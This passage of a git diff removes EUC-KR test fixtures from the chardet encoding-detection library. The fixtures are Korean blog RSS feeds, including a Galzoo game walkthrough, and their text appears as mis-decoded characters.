¾²ֱצµµ ¸רַֿ°ם ¸¸µח ¼³ִ¡ ¹צְְּ´. ´ח¿¬ָק ¿ֿ¼÷µµ¿ֽ´ֲ °ֵ¸®°¡ ¸ױ ¹צְְּ´. ֳ±ג ¼ֲ¾ק¹צְ. ֵ« ָו¸§¿¡¼­ ¹®ֱ¦¸¦ ָ®ְ־ַ״ ÷¸´ֲ ¹צְְּ ¸ְֲ»°ְּֽ´. »ץ÷®5½ֳ¿¡ ְ´ַ״ ֱײ°ם... -119@http://blog.bd-lab.com/blog/ -ֱַ·־±׳·¡¹ײ -2005-05-02T19:15:38+09:00 - - -ֶק±גַֿ´ -http://blog.bd-lab.com/blog/archives/000118.html -ֶק±גַֿ±ג·־ ַ´. ¾ֶ¸¶µµ ³»°¡ ְְֿ» ½ְֳַׁ ְִָּ¿¡ ֳ³ְ½ְ¸·־ ֶק±גַֿ´ֲ ְְּֿ µֹ °ֽ °°´. ¾ױ±¿¡¼­ ¾ך±גַׁ µ־ °¡ֱצ ְֿ ְֱַ ַׁ°¡ֱצ¸¦ ֶק±גַֿ±ג·־ ַ´. °°ְַּֿ´ֲ ִָ¹ט°¡ µµְתָק ¸צְּ ¸רְּ°¼­ ֱרַאְ» ¸רַֿ°´°ם ַֿ´ֿ ¹ז¹‎ְּ ¾ר´. ¿ר·¡ ½¬±ג·־ ַ´ר ִָ¹ט¿´±ג¿¡, ַׂ ¸»µµ ¾ר´. ³»°¡... -118@http://blog.bd-lab.com/blog/ -»ל¸י¼­ -2005-04-30T05:01:24+09:00 - - -µ־»ח¶ק µ־°¡ֱצְֿ -http://blog.bd-lab.com/blog/archives/000117.html -¿©ְָק ֱ₪½ְֵּ ¾ר´ֲ ַֿ·חַֿ·ח¸¦ ÷¸³»°ם ְײ´. ֱײ¸»¸¶´ ¹ד»ץ¹ּ. ±׳·± ¿ֱֽ¿¡ °ט¼׃ ¹ּ·ןֱ® ¿ְ´ר ְֿ ¸¶ְתµµ ¸¶¹«¸® ¿הֳ»ְ» ¹¾ׂ´. ְּ ְֿµµ '÷´'ְַ ְװְו¿¡¼­ ֱרַאַֿ´ֲ ְְּֿ¶ף¼­ 'ְ»'ְַ ¿×ְַּׂ ַ¿הַׁµ¥, 'ְ»'ְּ ֱרַאְּ ´¾מ¼­ ¹ּ·ן¿װ´ר ְְּֿ´. ¹°·׀ ִָ¹טֱ¿¡ ַׁ ¸םְּ ְּ ְְֿ» ´ד´חַֿ°ם ְײ´.... -117@http://blog.bd-lab.com/blog/ -ֱַ·־±׳·¡¹ײ -2005-04-18T18:09:24+09:00 - - - - - \ No newline at end of file diff --git a/chardet/tests/EUC-KR/blog.empas.com.xml b/chardet/tests/EUC-KR/blog.empas.com.xml deleted file mode 100644 index 7fc6fe8..0000000 --- a/chardet/tests/EUC-KR/blog.empas.com.xml +++ /dev/null @@ -1,45 +0,0 @@ - - - - - - Astral Epic - http://blog.empas.com/limpidly/ - - ko - limpidly - Copyright 2005 - - - hourly - 1 - 2003-10-01T12:00+00:00 - - Astral Epic - - http://blog.empas.com/limpidly/ - - - - ÷ם·־±׳ ¿ֵ±י´ֿ´ - http://blog.empas.com/limpidly/5583769 - 2004-12-27T11:30:00 - limpidly - Temporary - - - - - -ְּ·±ְת·± »‎°¢ ³¡¿¡, ÷ם·־±׳ ¿ֵ±ג±ג·־ °בֱ₪ַ½ְ´ֿ´.http://astralepic.egloos.comְּ°ק ¿¥ִֶ½÷÷ם·־±׳¿¡¼­ ְֱֱ÷ ÷׀µיְ» ¸¹ְּ ¸¸³µ´ֲµ¥..¶°³×´ֲ ´ְ³¦ְּ µי¾מ¼­ ¾ֶ½±°ם.. ±׳·¸½ְ´ֿ´.±׳·¸ֱצ¸¸ '¿¥ִֶ½÷' ¶ף´ֲ ¿ןֵ¸¸®¿¡ ±׳·¸°װ ֵ« ְַ¹ּ°¡ ְײ´°ם´ֲ »‎°¢ֱצ ¾½ְ´ֿ´. ¾מֲקַַ ÷ם·־±כְ» ֱצ¿רַֿ´ֲ µµ±¸¿¡ ÷ׂ°תַֿ´ֿ±מ¿ה. ְתְַ ÷ם·־±כµµ ֵ©°װ ´¶ףֱת °ְּֽ ¾ר°ם.÷ֿ¸¶ֵ©ְַ ¸µֵ© °°ְ÷ °ֽµיµµ ֱ¶¸¸°£ »ץ ÷ם·־±׳¿¡¼­ ¸נµ־ ÷¹±¸ַׂ »‎°¢ְװ´ֿ´.±׳°£ ְּ°קְ» ֳ£¾ֱֶײ¼ּ´ר ÷׀µי²² ±םְּ °¨»חµו¸³´ֿ´. ¾ָ³חָק °ט½½ֳ¿ְ. - - - \ No newline at end of file diff --git a/chardet/tests/EUC-KR/blog.rss.naver.com.xml b/chardet/tests/EUC-KR/blog.rss.naver.com.xml deleted file mode 100644 index bd99854..0000000 --- a/chardet/tests/EUC-KR/blog.rss.naver.com.xml +++ /dev/null @@ -1,149 +0,0 @@ - - - - - - - <![CDATA[alphathinker´װְַ ÷ם·־±׳]]> - http://blog.naver.com/alphathinker - - ko - - - - - - - - <![CDATA[2003³ג ¾ק ±׳·¹ְּµוµָ ±ג÷»°­ְַ½ֳ¸®ֱמ ¼צ°­ ¾ָ³»]]> - http://blog.naver.com/alphathinker/40002716789 - - Sun, 23 May 2004 19:57:35 +0900 - - - - - - - - - <![CDATA[ֱצַ‎·׃°װ ָ­³»´ֲ 12°¡ֱצ ¹ז¹‎?]]> - http://blog.naver.com/alphathinker/40002563135 - - Mon, 17 May 2004 22:38:51 +0900 - - - - - - - - - <![CDATA[MC101(ֱ¶ְ‎µָ ְּ¿ֿ)]]> - http://blog.naver.com/alphathinker/40002506909 - - Sat, 15 May 2004 16:49:04 +0900 - - - - - - - - - <![CDATA[MC202GSI(ְֿ¹ְ ְ±ג°³¼±)]]> - http://blog.naver.com/alphathinker/40002506905 - - Sat, 15 May 2004 16:48:54 +0900 - - - - - - - - - <![CDATA[MC303ESP,MC404AESP(ָ¿°תְ °¨°¢ֵץ»ח¿ֽ ±׳ ְ¿כ)]]> - http://blog.naver.com/alphathinker/40002506898 - - Sat, 15 May 2004 16:48:38 +0900 - - - - - - - - - <![CDATA[½ַ¹ ¸¼­µו(The Silva Method) ¿×»ח]]> - http://blog.naver.com/alphathinker/40002506338 - - Sat, 15 May 2004 16:19:22 +0900 - - - - - - - - - <![CDATA[½ַ¹ ¸¼­µו(The Silva Method) ¿ר¸®]]> - http://blog.naver.com/alphathinker/40002506325 - - Sat, 15 May 2004 16:19:09 +0900 - - - - - - - - - <![CDATA[½ַ¹ ¸¼­µו(The Silva Method) ָ¿°ת]]> - http://blog.naver.com/alphathinker/40002506321 - - Sat, 15 May 2004 16:18:49 +0900 - - - - - - - - - <![CDATA[½ַ¹ ¸¼­µו(The Silva Method)]]> - http://blog.naver.com/alphathinker/40001634263 - - Mon, 05 Apr 2004 16:07:02 +0900 - - - - - - - - - <![CDATA[[ֶ] ֱײְת¾ֹ°ם ½ְֽ» ¶§°¡ ְײ½ְ´ֿ´.]]> - http://blog.naver.com/alphathinker/40001634246 - - Mon, 05 Apr 2004 16:05:52 +0900 - - - - - - - - diff --git a/chardet/tests/EUC-KR/calmguy.egloos.com.xml b/chardet/tests/EUC-KR/calmguy.egloos.com.xml deleted file mode 100644 index 0612340..0000000 --- a/chardet/tests/EUC-KR/calmguy.egloos.com.xml +++ /dev/null @@ -1,489 +0,0 @@ - - - - - ּ¡×ערֽ׸×ל×׀ י«×«×°ב¢... - http://calmguy.egloos.com - «י«¹«ָ«ְ«ף«¹×עח×ֻ... - ko - Wed, 14 Jul 2004 00:52:26 GMT - - ּ¡×ערֽ׸×ל×׀ י«×«×°ב¢... - http://pds.egloos.com/logo/1/200407/14/60/b0012760.jpg - http://calmguy.egloos.com - 80 - 60 - «י«¹«ָ«ְ«ף«¹×עח×ֻ... - - - <![CDATA[ Galzoo ¾ְֶֿ·£µו °ר·« ]]> - http://calmguy.egloos.com/2041159 - - -¹«¸®ַ״¼­ µ¶ף°¥ ַ¿ה´ֲ ¾ר¾מ¿ה :D
    -ַׂ·½¿£µש ¹׳ ¿¡¸®³× ¿£µשְ» ֱ¦¿ַֿ°ם´ֲ '´ֿ¸¾´כ·־'ֳַ·¹ְַּֿ½ֳ±ז ±ַַױ´ֿ´.
    -
    -#±ג÷»ֱצ½ִ
    --÷» °װְ׃ְ÷ ½ֳ°£°תְַ ְְןְװ´ֿ´. ½ֳ°£ ³¶÷ס´ֲ ְ‎´כ ±¹°~!
    -ַֿ·חְַ ֳ¹ְֿ°ת´ֲ ¹«ֱ¶°ַ °¡±מ¿מ ¹ּ±ֳ°¡¼­ ֳ₪ֱ‎(H¿כ ¸ף½÷ֵֽ ¿¢±ג½÷ ְח·ב¼צֱ‎-ֳ¹¹רֲ°·־ ֳ₪ֱ‎ְ» ¼±ֱֳֵַֿצ ¾ְ¸¸י ¿¢±ג½÷ ְח·ב¼צֱ‎ ÷ׂ°¡)
    -ְִָּ SAVE(¾ַָֿ¸י ´«¹° ָך¸± ְְּֿ ֱ¾ֱ¾^^)
    -±גֵ¸ ִם½÷½ֳ ¹׳ ¹´ׂ¶ףְַ ¹ז¿¡ °¥°ֽ(ִם½÷½ֳ: ¾ְֵֶּ ֱ¶ַױ, ¹´ׂ¶ף: ·¹÷§¾ק)
    -ְַּֿ ¹ּ±ֳ µ¹ְװ
    -¹ּ±ֳ µ¹ְװ½ֳ ֶ¯÷°ַׁ °ז¿ל°¡ ¾ר´ֲ ַׁ ָ²ָ¥³ב(¸ף½÷ֵֽ ִֶ¿צ °­ָ­½ֳ) ֱ₪µµ¿¡ ³×¿ְ´ֲ °ֹ ֳֳµַױ´ֿ´.
    -¹וְֱ÷ ְתַ׳µµ°¡ 2°³ ְְַּֿֿ °ז¿ל ְֿ¹, 3°³¸י °­ָ­, 4°³ ְּ»ףְּ¸י ±׳³ֹ ְֿ¹ ·־ֱַ·־...
    -
    -@ °¡±מ¿מ ½£
    -1ְֲֿק - ִ¾ִ¾ ֶקָ¹
    -ְ´חָק ֱײ÷¯¿¡¼­ ³מ¸י¼­ ¾ְֵֶּ ¼צֱ‎ַֿ°ם ¸ף½÷ֵֽ¶ ½־¿צֱײ¸י µֻ´ֿ´.
    -ְת³ב ¸װ±ג ְ ֱ₪µµ¿¡ ¿¡³ֱצ °ְֵַ ¹´ְ־ »ףֲֵ¿¡¼­ ½־¿צֱײ¸י OK
    -
    -2ְֲֿק - ¸ְּµו ֶקָ¹
    -½£ְַ ¿לֳר¿¡ °¡¸י ¸ְּµו°¡ ְײ½ְ´ֿ´.
    -ַׁ¹ר ½־¿צ¼­ ְּ±ג¸י ¸ְּµו°¡ ±׳³ֹ °©´ֿ´.
    -µ־¹רֲ°·־ ´½ֳ ¿ל¿¬ָק ¸¸³³´ֿ´(¾ָ ½־¿ע)
    -¼¼¹רֲ°·־ ¸¸³×¼­ ½־¿ל¸י ֶקָ¹.
    -ֳײְֳַ ִ¡ְ¯°ט ִ³¸¯ְּ´ֿ ֱ¹±מֱצ ְ¯¿כָק ¾²½ֳ±ז...
    -ְּ³¯ְ÷ ¼צֱ‎÷¸´ ֶקָ¹¿¡ ְ³הַֿ±ז...
    -
    -3ְֲֿק - ¾¸נ¸µ ֶקָ¹
    -¸ְּµו°¡ °°ְּ ְײְ¸¸י µ¶¹«ָ¿°¡ µַ¹ַ·־ ְֱּ¦ ¾¸נ¸µְ» ְגְ¸·¯ °©½ֳ´
    -ֶַַׁ ÷°ם ³×¼­ µµֱײ... ±׳ µ¸¦ µ¶ף°¡¸י µ¶¹צ¼¸ ¶§¹®¿¡ µ¿·בµיְּ ¾²·¯ֱצ´ֲµ¥
    -2ָ¸±מֱצ ִ¾ִ¾°ת ¸ְּµו°¡ ¸צ»§ַֿ´ֿ ±׳³ֹ °©½ֳ´
    -±ז³¡¿¡¼­ ¾ַ¸¶ ֵ°¶ף¿ֽ ¸¸³×¸י ִ¡·בַ״ֱײ´ֿ OK
    -¿¡³ֱצ°¡ 3°³ ְְַּּֿ¸י °­ָ­ ·־ֱַ¸¦ »ח¿כַ״ ְגְ¾½ֳ´.(³כ°¡´ ַֿ±ג ½ֱָׂ? ^^ ¹°·׀ ַֿ³×ְֿ °ז¿ל ְֿ¹·־ֱַ)
    -
    -4ְֲֿק - ½£¼׃¸ ֳִִַ¸®ֶ®
    -½£¼׃ְ» µ¹¾ֶ´´ֿ¸ח ¾ְְֵֶּ» ְ÷־ ֱ₪¸®ַױ½ֳ´.
    -
    -@ ¼צ¼צ²²³¢ְַ °ֵ´כ ¼®»ף
    -5ְֲֿק - ¼½½ֳ³×ְֶּ® ֶקָ¹, ½÷ִִֹ¡ ֶקָ¹ ֱ״÷ס
    -ִם½÷½ְֳַ ¹ז¿¡ °¡¼­ °­ָ­·־ֱַ ¹׳ ¹±₪ֵ÷ְ» ¸¸µל´ֿ´(¹±₪ֵ÷ְ÷ ַָק 2°³ ְּ»ף)
    -¹ּ±ְֳ» µי¾מ°¡¼­ ¿ְ¸¥ְֲ¸·־ °©´ֿ´.
    -µµֱ¿¡ '³«¼­°³'¸¦ ¸¸³×¼­ ½÷ִִֹ¡ ֶקָ¹ ֱ״÷ס ³¡.
    -¿ְ¸¥ֲ ³¡ְ¸·־ °¡¼­ ¾מµ־¿מ ֱצ¿×ְ¸·־ µי¾מ°¡¸י ¼½½ֳ³×ְֶּ®°¡ ·£´‎ַֿ°װ ֳגַצַױ´ֿ´.(¸»±׳´כ·־ ·£´‎ְװ´ֿ´... °£´°ם ¹«ֱ¶°ַ ³×¿ְ´ֲ°װ ¾ֶ´ֿ¶ף)
    -¹µו½ֳ ¹±₪ֵ÷ְ» ֵֶֽ®¸®°ם ֶקָ¹ַױ´ֿ´. ¹±₪ֵ÷ְּ ¾רְ¸¸י ¾²·¯ֶ®·ֱµµ ¾מµ־¿צ¼­ ¾ָ÷¸ְּ¹ַ·־ ±׳´כ·־ µµ¸ֱ.
    -½±°װ ֶקָ¹ַֿ·ֱ¸י ֳ¹¹רֲ° ¸¸³²¿¡¼­ ¹±₪ֵ÷ְ» »ח¿כַ״ ¾²·¯ֶ®¸®°ם °­ָ­·־ֱַ »ח¿כ
    -ַגִָ ִֶ±«·ֲ¸י¿¡¼­ ¹±÷ְּ¹ַ·־ ֶקָ¹ ֳֳµַױ´ֿ´.
    -
    -6ְֲֿק: ½÷ִִֹ¡ ֶקָ¹, »ח¿ֽ ֶקָ¹ ֱ״÷ס
    -½÷ִִֹ¡´ֲ ·£´‎ַֿ°װ ³×ֵ¸³×¹ַ·־ ¿ל¼± ¿ְ¸¥ְֲ¸·־ °¡´°¡ ¿לֳר »ף´ְַ ¿¡½÷ֳִ·¹ְֶּ® »ח¿כַ״¼­ µ¹¾ֶ°¡½ֳ±ז...(»ח¿ֽ ֶקָ¹ ֱ״÷ס) ¿¡½÷ֳִ·¹ְֶּ®¸¦ ֵ¸¸י »ח¿ֽ°¡ ³×ֵ¸³×´ֲµ¥ ÷ַׁׂ¹ר ½מ°ם µµ¸ֱ°¡´ֿ±מ ·¹¿ְ·־ ַׁ¹ז¾¿ ֱֳִ°ֽ.
    -»ף´ ֱ°£ְ» µ¹¾ֶ¼­ ֱֲ»ף´ְַ ¿¡½÷ֳִ·¹ְֶּ® »ח¿כ, ֱֱֲ°£ְ¸·־ ְּµ¿
    -ֱֱֲ°£ְַ ¹ז¿¡ µי¾מ°¡¼­ °ֵ´כ³«¼­±«¹°°ת ֱ¶¿ל, °ֵץ°¡ µַ¸י ¹·־ 'µµ¸ֱ°£´' ¼±ֱֳֵצ·־ ÷ֱת°ֽ
    -ֱֲַֿ´ְ¸·־ ְּµ¿, ¿¡½÷ֳִ·¹ְֶּ® 3¹ר µ¹¸י »ח¿ֽ °ר·«ֱ״÷ס ³¡
    -(ְּ¶§ֲכְּ¸י ½÷ִִֹ¡¿ֽ ַׁµ־¹רְ÷ ¸¸³¯ֵµ¥ °ְֵַ 2¹רֲ°ֶקָ¹¿¡¼­ ְג½ְ´ֿ´.)
    -¿לֳר ֱ´ְַ ¹ז¿¡¼­ ¿צֱַ ֶקְ־ֶ®¸¦ ְּ¿כַ״¼­ ´½ֳ ֱ¾׃ְ¸·־ ְּµ¿. ¾ֱֶק±מֱצ ½÷ִִֹ¡ ֶקָ¹ְּ ¾ָµַ¾מ ְײְ¸¸י ֱ₪ֱ¾׃ ֵכ·־¸¦ ְּ¿כַֿ¿© ±ְ÷¬ְּµ¿ַױ½ֳ´.(±ְ÷¬ְּµ¿: ·£´‎ְ¸·־ ִֹ¸¯ֵֽ°¡ µמְוַֿ¹ַ·־ ַׁ ְו¼ׂ¿¡¼­ ְ´חָק ½ֳ°£ ¶§¿ל¸ח ְּµ¿)
    -½÷ִִֹ¡¸¦ ֶקָ¹ַֿ¸י ¹דְַ ְּ÷¥ֶ®¿¡¼­ ¹µו½ֳ ¼±ֳֵַֿ¿© ´כָ­ַׂ°ֽ(°ֵ´כ³«¼­±«¹° ֵנִ¡)
    -
    -7ְֲֿק: »ח¿ֽ ֶקָ¹
    -ְּ¹ר¿¡´ֲ ֱֲֳרְ¸·־ ְּµ¿, ֱֱֲ´ְַ ¹ז¿¡ µי¾מ°¡¼­ ³«¼­±«¹° ֳ³¸®ַֿ°ם, ַֿ´ְ¸·־ ְּµ¿ַֿ¸י ¹זְּ ³×¿ֹ´ֿ´(¿¡·¹³×ְַ ֵ°°¡ ַ¿ה)
    -µֲַ₪¾מ ³×¿ֽ¼­ ֱֲַֿ´ְַ ¹ז¿¡ µי¾מ°©´ֿ´(»שְַ ¿הֱ₪ ¿הִ ְּ÷¥ֶ®)
    -ְ´חָק ¾ְֵֶּ ¼צֱ‎ַֿ°ם ¿¡½÷ֳִ·¹ְֶּ® ֵ¸¸י »ח¿ֽ ְµ¿ ֶקָ¹
    -
    -8ְֲֿק: ַֿ´ֿ¿ֽ ְּ÷¥ֶ®
    -¾ִֶ§¿¡ ִם½÷½ֳ¸¦ ¸¸³× ¸¸נֱצ ַֿ³× ¸¸µל´ֿ´.
    -ְּ°ֹ °¡ֱצ°ם ½£¿¡ °¡¼­ ¾ְֵֶּ ¼צֱ‎ ¹׳ »ח³ַֹֿ´ ְ´חָק ½ֳ°£ ¸ֲֳח '÷½ְַ ¼צָ£¸ס'°ת ´כָ­(¿לֳר »ף´)
    -ְַּֿ ±ָֽ¯
    -
    -9ְֲֿק: ¿¡·¹³×¿ֽ ´כ°ב, °שְ¸·־ °¡´ֲ »ח´¸® ¹°
    -ֱֲֳרְ¸·־ ְּµ¿ַֿ¸ח ֱֲַֿ´ְַ ¹ז¾ױ¿¡¼­ ¿¡·¹³× ¹°, ְֵץ
    -¾²·¯ֶ®¸®¸י ¿¡·¹³×ְַ ֵ° ְװ¼צ
    -¿הִ¿¡°װ »חְ־ֱצ °®´ ֱײ¸י ¾ְֵֶּ ְװ¼צ
    -ְִָּ ֱֲַֿ´ְַ ¹ז¿¡ °¡¼­ ְת½÷ֶ¼½÷¸¦ ¾²·¯ֶ®¸®°ם »ח´¸® ְװ¼צ
    -
    -@°ש
    -10ְֲֿק: ¹´ׂ¶ף ֶקָ¹ ¹׳ ִֶ¼ ֶקָ¹ ֱ״÷ס
    -°ש¿¡ µי¾מ°¡¼­ ¹´ׂ¶ף¿ֽ ¸¸³× ְֵץ, ֶקָ¹
    -ְִָּ °¡´ַַֹׁׁ °שְַ ¸ ֵ½»צ
    -(ִֶ¼ְַ ¹«´‎±מֱצ °¡¼­ ִֶ¼¸¦ 1¹ר ¸¸³×¸י OK)
    -
    -11ְֲֿק: ִ«¸ִ ֶקָ¹
    -ִ«¸ִ¸¦ ¸¸³×¼­ ְֵץ ִָ ֶקָ¹ַױ´ֿ´. ±׳ ְְּ¿¡ ֱַ¸®´‎ְ» µ־¹ר ¸¸³× ְֵץ(»ךְֱַר¹ּ¸¦ ֶקָ¹ַֿ´ֲ ֱ₪÷¸ ְװ¼צ¿¡ ַ¿ה)
    -ִ«¸ִ¿ְַֽ ְֵץ´ֲ ְ÷־ 3¹רְּ¹ַ·־ ·־ֱַ¸¦ ¸¹ְּ ֱ״÷סַׂ °ֽ, ֳ³ְ½ µ־¹רְ÷ ֶקָ¹ַ״µµ µµ¸ֱ°¡¹ַ·־ ְֿ¹ ·־ֱַ »ח¿כ
    -3¹רֲ° µµ¸ֱ°£ ´ְ½ ·£´‎ְ¸·־ ¸¸³×¹ַ·־ ¾ֻ¾ֶ¼­ ֶקָ¹
    -
    -12ְֲֿק: ִֶ¼ ֶקָ¹
    -ִם½÷½ֳ¸¦ ¸¸³×¼­ ¿µָ¥ֶקָ¹·־ֱַ¸¦ ְװ¼צ.
    -ִֶ¼¸¦ ֶקָ¹ַֿ·¯ °¡±ג ְ¿¡ ¸ֱ´ ¾ֶ·¡ֲ¿¡ °¡¸י »ףְ־ְ» ¸¸³³´ֿ´(ֱ₪÷¸7 ±¸¸ֵ)
    -ְִָּ ¹¦ֱצ·־ °¡¼­ ִֶ¼ ֶקָ¹
    -
    -13ְֲֿק: »ךְֱַר¹ּ ֶקָ¹
    -ִם½÷½ֳ¸¦ ¸¸³× ֵץ¸ם½÷ֱַ·¹ְּ ְװ¼צ(»ח¿כַֿ¸י ¸ף½÷ֵֽ ´«¿¡ ¾ָ÷¸ְ׃)
    -¸ֱֲַֿ´±מֱצ ְּµ¿ַֿ¿© ֱ₪÷¸7ְ» ְּ¿כַֿ°ם ³­ ִָ ֵץ¸ם½÷ֱַ·¹ְּ »ח¿כ, ¾נ´צְ» µ¹¾ֶ´´ֿ´ »ךְַ ֱר¹ּ ֶקָ¹
    -
    -14ְֲֿק: ¸ ֱ´ְַ ִִ«ֶ®¸®½÷°¡ ְײ´ֲ ֱצֱ¡ °ר·«
    -¾ִֶ§¿¡ ְֿ¾מ³×¼­ ַַ¶ף¹ּµו¿¡ °¡¼­ ½÷ַ־ֵ©½÷ְַ ¼צ¼צ²²³¢¸¦ µיְ»°ֽ
    -ִִ«ֶ®¸®½÷¸¦ ¾²·¯¶¸®°ם ִ«¹ּ³×¸®ֵ¸ְִּ¿ֽ °µ¹ ְּ÷¥ֶ®(¸ר ְּ±ג´ֿ±מ ¾ֻ¾ֶ¼­ ¾²·¯ֱת °ֽ)
    -ְִָּ ¹ֵ°¸® µמְו ִָ ֵ½ַטְ» °ט¼׃ַֿ¿© ´¸® °ַ³־°ֽ
    -÷¯ֲֵ ְ¯·ֱֹד¿ֽ ִֶ¼ ְּ÷¥ֶ® ³¡³×°ם ֵ½ַטְ» ַֿ´ ¿¡¸®³×¿ֽ °µ¹
    -ְֵץ ִָ ֱ´ ¾נ´צ¿¡ ¿ֳ¶ף°¡ ֳ¥²ְָּ¿¡¼­ ¼צ¼צ²²³¢ְַ ַ״´ה ְװ¼צ(ַַ¶ף¹ּµו ֳגְװ °¡´ֹ)
    -
    -@ ַַ¶ף¹ּµו
    -15ְֲֿק: ֳִ× ¹׳ ³׳ִ¸¶ֵ¸¸¶ֵ¸ ֶקָ¹ ֱ״÷ס
    -¿ְ¸¥ֲ °ט´ְ» ¿ְ¸£¸י ֳִ× ְּ÷¥ֶ®, ְִָּ¿¡ 1ְֱֿצ³× °ם¹®ְּ÷¥ֶ® ÷¸°ם ֶקָ¹°¡´ֹ
    -³׳ִ¸¶ֵ¸¸¶ֵ¸´ֲ ·£´‎ְּ÷¥ֶ®·־ °װְֳּק95¸¦ ¾²·¯¶¸®´ֲ ְּ÷¥ֶ®¸¦ ÷¸°ם ³×¼­ ֶקָ¹°¡´ֹ
    -(15ְְֿ÷ ¾מµנ±מֱצ³× ֱ״÷סְַ ³¯^^)
    -¿ְ¸¥ְֲ¸·־ ְּµ¿ַֿ¿© ַכ°ְׂ» ¸¸³×¸י ¹°ְ» ³¢¾ס¾מ ¹ְּּ¶ף¸ְַ» ÷־ָ°½ֳֵ°°ם »שְַ ¿הֱ₪ ¿הֲִ¯ְ» ¸¸³¯°ֽ
    -ְִָּ ¿ְ¸¥ֲ ֱ°£ְַ ¿צְֱַַ½ְִַ ¹ז¿¡ °¡¼­ ְַ½ְִּ ַ¿הַֿ´´ֲ ¸»ְ» µיְ» °ֽ
    -¿ְ¸¥ֲ ַֿ´ְַ ¹ז¿¡ µי¾מ°¡¼­ ¼®ֶַ1 ְװ¼צ(¹ז¿¡ µי¾מ°¡·ֱ¸י ·¹¹צ¸¦ ´­·¯³מ °ֽ),
    -¼®ְֶַ» °¡ֱצ°ם ¹ְּּ¶ף¸ַ¿¡°װ °¥°ֽ, ְִָּ ¿צְֱַַ¹ז¿¡ °¡¸י ְּ÷¥ֶ®ִָ ֵ¸ ֶקְ־ֶ®·־ ְּµ¿°¡´ֹ
    -
    -16-17ְֿ: ֳִ× ¹׳ ³׳ִ¸¶ֵ¸¸¶ֵ¸ ֶקָ¹
    -¾מ´ְְֲּ³× ·£´‎ ְּ÷¥ֶ®·־ ¸¸³×¹ַ·־ ְגָק´ֲ ֲ ¸ױְת ֶקָ¹
    -ֳִ×ְ÷ ַׁ¹רְ¸·־ ¾ָ ְגָק¹ַ·־ ·־ֱַ »ח¿כְ» ½ֱֵָק...
    -ַַ¶ף¹ּµו °ר·«ְ» ְ§ַ״¼­ ְַ½ְִ» ִ¡¸£¸י ֱֲִָ´ְ¸·־ °¡´ֲ ¿צֱַ°װְֶּ®°¡ ¿­¸²
    -ֱֲִָ´¿¡ °¡¼­ ¼®ֶַ 2ְװ¼צ, ´ ¹זְ¸·־ µי¾מ°¡±ג ְ§ַ״¼­´ֲ ·¹¹צ¸¦ ´­·¯¾ ַֿ´ֲµ¥
    -·¹¿ְ, »ח¿ֽ(¼÷ְ־), ±גֵ¸ ְ»‎ְ» ֵכַ״ ¾מ¸°ְּ°¡ µָ ִ³¸¯¸¸ ·¹¹צ·־ °¡´ֲ ´¸®°¡ ֵכ°ת °¡´ֹ
    -
    -18ְֿ-21ְֿ: ֱַ·־ֱנ ֶקָ¹ ¹׳ ַַ¶ף¹ּµו ¸°ר·«
    -ֱַ·־ֱנְ÷ ´«ְַ°­¾ֱֶצ¸¦ ְװ¼צֱַֿצ ¾ְ¸¸י ֶקָ¹ְּ ¾ָµַ¹ַ·־
    -°­¾ֱֶצ¸¦ ¾עֱצ ¸רְַ» °ז¿ל ¾ֻ¾ֶ¼­ µµ¸ֱ°¥°ֽ
    -ַַ¶ף¹ּµו ¸°ר·«ְ÷ ¼®ְֶַװ¼צ --> ¹ְּּ¶ף¸ַ¿¡°װ ֱת¹® -->ְַ½ִ(¿צְֱַַ ¹ז)
    -ֱ°£¿¡ ¿¡¸®³×¿ֽ ְֵֵַ ·¹ֱמ ְּ÷¥ֶ® ִָ ַַ¶ף¹ּµו¿¡ µי¾מ°¡¸י ֱצֱרְּ ְֿ¾מ³× ÷®ְּ ¹«³ֱ®¼­
    -ֱצ±±מֱצ °¡ֱצ ¸רַֿ´ר °ק¿¡ °¥¼צְײ°װ µַ¹ַ·־ ַָק µי¾מ°¡ ¾ְֵֶּ ְװ¼צ
    -
    -@ ¸נ·¡»חְו
    -22ְֿ: ִם½÷½ֳ ֶקָ¹ ¹׳ ֳ­÷־ֳ­÷־ ֶקָ¹
    -ַ״÷¯ְַ ¿ְ¸¥ְֲ¸·־ ְּµ¿ַֿ¿© ¿¡¸®³×ְַ ַ״¼צ¿ו ְּ÷¥ֶ® ÷¼°ֽ(½÷ִ±ְִֶַ ¹ד ֳגַצ »ח½ַ ָ®ְ־)
    -ִם½÷½ֳ´ֲ ¹ט¸¦ ֵ¸°ם ֱ¾׃ְַ ¼¶¿¡ °¡¸י ֶקָ¹
    -ֳ­÷־ֳ­÷־´ֲ ¹ט¸¦ ֵ¸°ם ¼¶ְ» ְּµ¿ַֿ¸ח ¾ְֵֶּ ¼צֱ‎ ¹׳ °זַטִ¡ ָ¹µז ֱ ·£´‎ַֿ°װ ֶקָ¹
    -
    -23ְֿ: ½÷ִ±ִֶ ֶקָ¹ ֱ״÷ס
    -ֳ­÷־ֳ­÷־¸¦ ִֶֶ¼¿¡ ³ײ°ם ¼צֱֵ½ַט ¹׳ °ר·«
    -½÷ִ±ִֶ´ֲ 21½ֳ ְּ¿¡ ֱֲֳרְַ ³×·חֵֽ¿¡ ³×ֵ¸³²(ֶקָ¹ ֱ״÷ס ֱ¶°ַ)
    -
    -24ְֿ: ½÷ִ±ִֶ ֶקָ¹, ¿¡¸®³×¿ֽ ְֵץ
    -ֳ­÷־ֳ­÷־¸¦ ³ײ°ם ¼צְֱ» ְּµ¿ַֿ¿© ¿¡¸®³×¿ֽ ¸¸³× ְֵץ, ְִָּ ¹®¾מ¿ױ°ת ¸¸³× ְּ¾±ג(³×·חֵֽ ַֿ´¿¡ ¿צֱַ ֶקְ־ֶ® »‎¼÷)
    -½÷ִ±ִֶ´ֲ ·£´‎ַֿ°װ ֳגַצַֿ³× ¹°¼׃¿¡¼­´ֲ ³×ֵ¸³×ֱצ ¾ְ¸¹ַ·־ ֱײְַ(ֱײ·־ ֱֲֳר ³×·חֵֽ)
    -
    -25ְֿ-26ְֿ: ַ״ְת °ר·« ¹׳ ¹´ְַ ֱר¹ּ ֶקָ¹
    -¿צֱַ ֶקְ־ֶ®¸¦ ֵכַ״ ַ״ְת·־ ְּµ¿, 4±÷µ¥ְַ 'ַ״·ש'¸ף½÷ֵֽ ֱ¦°ֵ(ַ״ְת ½ְֵ µ¹ְװ ֱ¶°ַ)
    -ַ״ְת½ְֵ µ¹ְװִָ ִ«¹ּ³×¸®ֵ¸ְְִּּ÷¥ֶ® ִָ ַ״ְת °ר·« ³¡.
